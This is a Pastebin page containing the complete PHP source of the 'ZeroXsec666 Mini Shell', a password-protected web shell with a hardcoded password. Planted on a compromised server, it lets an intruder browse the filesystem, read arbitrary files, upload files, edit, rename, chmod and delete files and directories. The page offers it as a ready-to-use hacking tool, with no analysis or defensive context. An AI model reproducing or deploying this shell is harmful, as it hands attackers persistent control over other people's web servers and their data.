ZeroXsec666

ZeroXsec666 Mini Shell

Jul 5th, 2020
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.45 KB | None | 0 0
  1. <?php
  2. session_start();
  3. $pass = @$_POST['pass'] ;
  4. $sv = $_SERVER['HTTP_HOST'];
  5. $password = 'henriz1987';
  6. if ($pass == $password)
  7. {
  8.     $_SESSION['barca'] = "$pass";
  9. }
  10.  if(!isset($_SESSION['barca']) or $_SESSION['barca'] != $password)
  11.  {
  12.     echo  "<html>
  13. <head>
  14. <title>Hayo Mau Dorking ya</title>
  15. <style type=>
  16. body{
  17. background-color:black;
  18.  
  19. }
  20.  
  21. input,button
  22. {  
  23.    font-size: 11pt;
  24.    color:#FF933E;
  25.    font-family: Orbitron;
  26.   border: 2px #FF933E solid;
  27.    -moz-border-radius: 5px #FF933E;
  28.    -webkit-border-radius:5px #FF933E;
  29.    border-radius:5px;
  30. }
  31. </style>
  32. </head>";
  33.  
  34.      die('<br><br><br>
  35.  <center><img src="https://s7.gifyu.com/images/5929abf369c628c994312d4998b3f23b.jpg" width="250" height="300"></center><br>
  36. <div align=center >
  37. <form method="POST" action="">
  38. <input name="pass" type="password" size="30" placeholder="Masukin passwordnya asw">
  39. <input type="submit" value="Tusboll!!">
  40. </form>
  41. <div>
  42. <body>
  43.     </html>') ;
  44.    
  45. }
  46. set_time_limit(0);
  47. error_reporting(0);
  48.  
  49. if(get_magic_quotes_gpc()){
  50. foreach($_POST as $key=>$value){
  51. $_POST[$key] = stripslashes($value);
  52. }
  53. }
  54. echo '<!DOCTYPE HTML>
  55. <html>
  56. <head>
  57. <link href="" rel="stylesheet" type="text/css">
  58. <title>ZeroXsec666 Mini Shell</title>
  59. <style>
  60. div#container{   width: 931px;   position: relative;   margin-top: 0px;   margin-left: auto;   margin-right: auto;   text-align: left;}
  61.  
  62. html {
  63. color: #FF75EE;
  64. }
  65. body {
  66.     background-image: url("https://s7.gifyu.com/images/5929abf369c628c994312d4998b3f23b.jpg");
  67.     background-size: cover;
  68.     color: #FF75EE;
  69.     font-family: ;
  70. }
  71. a {
  72. color: #FF75EE;
  73. text-decoration: none;
  74. }
  75. a:hover{
  76. color: #FF75EE;
  77. text-shadow:0px 0px 10px #ffffff;
  78. }
  79. input,select,textarea{
  80. border: 1px #FF933E solid;
  81. -moz-border-radius: 5px;
  82. -webkit-border-radius: 5px;
  83. border-radius: 5px;
  84. }
  85. #content tr:hover{
  86. background-color: #191919;
  87. text-shadow:0px 0px 10px #fff;
  88. }
  89.  
  90. #content .first{
  91. background-color: #191919;
  92. }
  93. hr {
  94. color: #FF75EE;
  95. }
  96. table{
  97. border: 1px #000000 solid;
  98. }
  99. textarea {
  100. border: 1px solid white;
  101. color: #FF75EE;
  102. background: transparent;
  103. }
  104. li {
  105. display: inline;
  106. margin: 5px;
  107. color: #FF75EE;
  108. }
  109. .i {
  110. color: #FF75EE;
  111. }
  112. input { background: transparent; color: #FF75EE; border: 1px solid #FF75EE; }
  113. select { background: transparent; color: #FF75EE; border: 1px solid #FF75EE; }
  114. .aw { background: transparent; color: aqua; border: 1px solid aqua; padding: 5px; width: 30%;}
  115. </style>
  116. </head>
  117. <body>
  118. </center>
  119. <h1>
  120. <center>
  121. <img src="https://s7.gifyu.com/images/images86dbc1740a5b2c4e.jpg"width="300"height="300"><br><br>
  122. <font color="#FF75EE">ZeroXsec666 Mini Shell</font>
  123. </center>
  124. </h1>
  125. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  126. <tr><td><font color="white">Path :</font> ';
  127. if(isset($_GET['path'])){
  128. $path = $_GET['path'];
  129. }else{
  130. $path = getcwd();
  131. }
  132. $path = str_replace('\\','/',$path);
  133. $paths = explode('/',$path);
  134.  
  135. foreach($paths as $id=>$pat){
  136. if($pat == '' && $id == 0){
  137. $a = true;
  138. echo '<a href="?path=/">/</a>';
  139. continue;
  140. }
  141. if($pat == '') continue;
  142. echo '<a href="?path=';
  143. for($i=0;$i<=$id;$i++){
  144. echo "$paths[$i]";
  145. if($i != $id) echo "/";
  146. }
  147. echo '">'.$pat.'</a>/';
  148. }
  149. echo '</td></tr><tr><td>';
  150. $file   = $_FILES['files']['name'];
  151. if(isset($_FILES['file'])){
  152. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  153. echo '<font color="lime">Berhasil Upload</font<A href="$file" target="_blank">$file</A>><br />';
  154. }else{
  155. echo '<font color="pink">Gagal Upload,Cek Permission</font><br/>';
  156. }
  157. }
  158. echo '<form enctype="multipart/form-data" method="POST">
  159. <font color="white">File Upload :</font> <input type="file" name="file" />
  160. <input type="submit" value="upload" />
  161. </form>
  162. </td></tr>';
  163. if(isset($_GET['filesrc'])){
  164. echo "<tr><td>Current File : ";
  165. echo $_GET['filesrc'];
  166. echo '</tr></td></table><br />';
  167. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  168. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  169. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  170. if($_POST['opt'] == 'chmod'){
  171. if(isset($_POST['perm'])){
  172. if(chmod($_POST['path'],$_POST['perm'])){
  173. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  174. }else{
  175. echo '<font color="pink">Change Permission Gagal</font><br />';
  176. }
  177. }
  178. echo '<form method="POST">
  179. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  180. <input type="hidden" name="path" value="'.$_POST['path'].'">
  181. <input type="hidden" name="opt" value="chmod">
  182. <input type="submit" value="Go" />
  183. </form>';
  184. }elseif($_POST['opt'] == 'rename'){
  185. if(isset($_POST['newname'])){
  186. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  187. echo '<font color="lime">Ganti Nama Berhasil</font><br/>';
  188. }else{
  189. echo '<font color="pink">Ganti Nama Gagal</font><br />';
  190. }
  191. $_POST['name'] = $_POST['newname'];
  192. }
  193. echo '<form method="POST">
  194. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  195. <input type="hidden" name="path" value="'.$_POST['path'].'">
  196. <input type="hidden" name="opt" value="rename">
  197. <input type="submit" value="Go" />
  198. </form>';
  199. }elseif($_POST['opt'] == 'edit'){
  200. if(isset($_POST['src'])){
  201. $fp = fopen($_POST['path'],'w');
  202. if(fwrite($fp,$_POST['src'])){
  203. echo '<font color="lime">Berhasil Edit File, gud anjg</font><br/>';
  204. }else{
  205. echo '<font color="pink">Gagal Edit File , Cek Permission Dir :D</font><br/>';
  206. }
  207. fclose($fp);
  208. }
  209. echo '<form method="POST">
  210. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  211. <input type="hidden" name="path" value="'.$_POST['path'].'">
  212. <input type="hidden" name="opt" value="edit">
  213. <input type="submit" value="Save" />
  214. </form>';
  215. }
  216. echo '</center>';
  217. }else{
  218. echo '</table><br/><center>';
  219. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  220. if($_POST['type'] == 'dir'){
  221. if(rmdir($_POST['path'])){
  222. echo '<font color="lime">Directory Terhapus</font><br/>';
  223. }else{
  224. echo '<font color="pink">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
  225. }
  226. }elseif($_POST['type'] == 'file'){
  227. if(unlink($_POST['path'])){
  228. echo '<font color="lime">File Terhapus</font><br/>';
  229. }else{
  230. echo '<font color="pink">File Gagal Dihapus</font><br/>';
  231. }
  232. }
  233. }
  234. echo '</center>';
  235. $scandir = scandir($path);
  236. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  237. <tr class="first">
  238. <td><center>Name</peller></center></td>
  239. <td><center>Size</peller></center></td>
  240. <td><center>Permission</peller></center></td>
  241. <td><center>Modify</peller></center></td>
  242. </tr>';
  243.  
  244. foreach($scandir as $dir){
  245. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  246. echo '<tr>
  247. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  248. <td><center>--</center></td>
  249. <td><center>';
  250. if(is_writable($path.'/'.$dir)) echo '<font color="lime">';
  251. elseif(!is_readable($path.'/'.$dir)) echo '<font color="pink">';
  252. echo perms($path.'/'.$dir);
  253. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  254.  
  255. echo '</center></td>
  256. <td><center><form method="POST" action="?option&path='.$path.'">
  257. <select name="opt">
  258. <option value="">Select</option>
  259. <option value="delete">Delete</option>
  260. <option value="chmod">Chmod</option>
  261. <option value="rename">Rename</option>
  262. </select>
  263. <input type="hidden" name="type" value="dir">
  264. <input type="hidden" name="name" value="'.$dir.'">
  265. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  266. <input type="submit" value=">">
  267. </form></center></td>
  268. </tr>';
  269. }
  270. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  271. foreach($scandir as $file){
  272. if(!is_file($path.'/'.$file)) continue;
  273. $size = filesize($path.'/'.$file)/1024;
  274. $size = round($size,3);
  275. if($size >= 1024){
  276. $size = round($size/1024,2).' MB';
  277. }else{
  278. $size = $size.' KB';
  279. }
  280.  
  281. echo '<tr>
  282. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  283. <td><center>'.$size.'</center></td>
  284. <td><center>';
  285. if(is_writable($path.'/'.$file)) echo '<font color="lime">';
  286. elseif(!is_readable($path.'/'.$file)) echo '<font color="pink">';
  287. echo perms($path.'/'.$file);
  288. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  289. echo '</center></td>
  290. <td><center><form method="POST" action="?option&path='.$path.'">
  291. <select name="opt">
  292. <option value="">Select</option>
  293. <option value="delete">Delete</option>
  294. <option value="chmod">Chmod</option>
  295. <option value="rename">Rename</option>
  296. <option value="edit">Edit</option>
  297. </select>
  298. <input type="hidden" name="type" value="file">
  299. <input type="hidden" name="name" value="'.$file.'">
  300. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  301. <input type="submit" value=">">
  302. </form></center></td>
  303. </tr>';
  304.  
  305. }
  306. echo '</table>
  307. </div>';
  308. }
  309. echo "<font color='red'><br><tr><center><a href='?'>Home</a></center></font>";
  310. echo '</body>
  311. </html>';
  312. if($_GET['logout'] == true) {
  313.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  314.     echo "<script>window.location='?';</script>";
  315. }
  316. echo '<center><br/>Copyright 2020 by ZeroXsec666</center>
  317. </body>
  318. </html>';
  319. function perms($file){
  320. $perms = fileperms($file);
  321.  
  322. if (($perms & 0xC000) == 0xC000) {
  323. // Socket
  324. $info = 's';
  325. } elseif (($perms & 0xA000) == 0xA000) {
  326. // Symbolic Link
  327. $info = 'l';
  328. } elseif (($perms & 0x8000) == 0x8000) {
  329. // Regular
  330. $info = '-';
  331. } elseif (($perms & 0x6000) == 0x6000) {
  332. // Block special
  333. $info = 'b';
  334. } elseif (($perms & 0x4000) == 0x4000) {
  335. // Directory
  336. $info = 'd';
  337. } elseif (($perms & 0x2000) == 0x2000) {
  338. // Character special
  339. $info = 'c';
  340. } elseif (($perms & 0x1000) == 0x1000) {
  341. // FIFO pipe
  342. $info = 'p';
  343. } else {
  344. // Unknown
  345. $info = 'u';
  346. }
  347.  
  348. // Owner
  349. $info .= (($perms & 0x0100) ? 'r' : '-');
  350. $info .= (($perms & 0x0080) ? 'w' : '-');
  351. $info .= (($perms & 0x0040) ?
  352. (($perms & 0x0800) ? 's' : 'x' ) :
  353. (($perms & 0x0800) ? 'S' : '-'));
  354.  
  355. // Group
  356. $info .= (($perms & 0x0020) ? 'r' : '-');
  357. $info .= (($perms & 0x0010) ? 'w' : '-');
  358. $info .= (($perms & 0x0008) ?
  359. (($perms & 0x0400) ? 's' : 'x' ) :
  360. (($perms & 0x0400) ? 'S' : '-'));
  361.  
  362. // World
  363. $info .= (($perms & 0x0004) ? 'r' : '-');
  364. $info .= (($perms & 0x0002) ? 'w' : '-');
  365. $info .= (($perms & 0x0001) ?
  366. (($perms & 0x0200) ? 't' : 'x' ) :
  367. (($perms & 0x0200) ? 'T' : '-'));
  368.  
  369. return $info;
  370. }
  371. ?>
Add Comment
Please, Sign In to add comment